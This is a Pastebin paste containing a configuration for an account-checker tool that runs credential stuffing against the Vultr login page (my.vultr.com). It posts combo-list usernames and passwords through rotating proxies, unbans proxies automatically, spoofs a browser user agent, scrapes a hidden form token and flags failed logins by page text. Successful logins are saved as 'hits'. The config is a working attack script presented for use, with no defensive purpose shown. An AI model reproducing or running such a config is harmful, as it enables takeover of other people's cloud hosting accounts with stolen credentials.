Advertisement
Guest User

Untitled

a guest
Jun 19th, 2018
129
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.29 KB | None | 0 0
  1. [General]
  2. UseProxy = True
  3. UseGlobalKeywords = False
  4. DefaultTimeout = 15
  5. UnbanAllProxiesWhenAllBannedAfter = 5.0
  6. HitsFolderName = vultr
  7. Debug = True
  8. [Stage-1]
  9. Condition = Any
  10. Variable-1 = $Link = "https://my.vultr.com/"
  11. Link = $Link#
  12. isFTP = False
  13. HTTPVersion = 1.1
  14. FollowRedirect = True
  15. HTTPRequestMethod = Post
  16. Timeout = 20
  17. Variable-2 = $action = findtagval($Stage1ResponseSource#,"<input type=chr(double quotes)hiddenchr(double quotes) name=chr(double quotes)actionchr(double quotes) value=chr(double quotes)","chr(double quotes)")
  18. Variable-3 = $Heads = "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\ncontent-type: application/x-www-form-urlencoded\nreferer: https://my.vultr.com/\nupgrade-insecure-requests: 1\nuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\n"
  19. Headers = $Heads#
  20. Variable-4 = $PostContent = combinetext("username=",$combousername#,"&password=",$combopassword#,"&action=",$action#)
  21. PostContent = $PostContent#
  22. Variable-5 = $IndexOfFailKey = indexof($Stage1ResponseSource#,"Invalid username/password")
  23. Failure-Condition = $IndexOfFailKey# >= 0 || $IndexOfFailKey2# >= 0
  24. Variable-6 = $IndexOfFailKey2 = indexof($Stage1ResponseSource#,"forgot my password")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement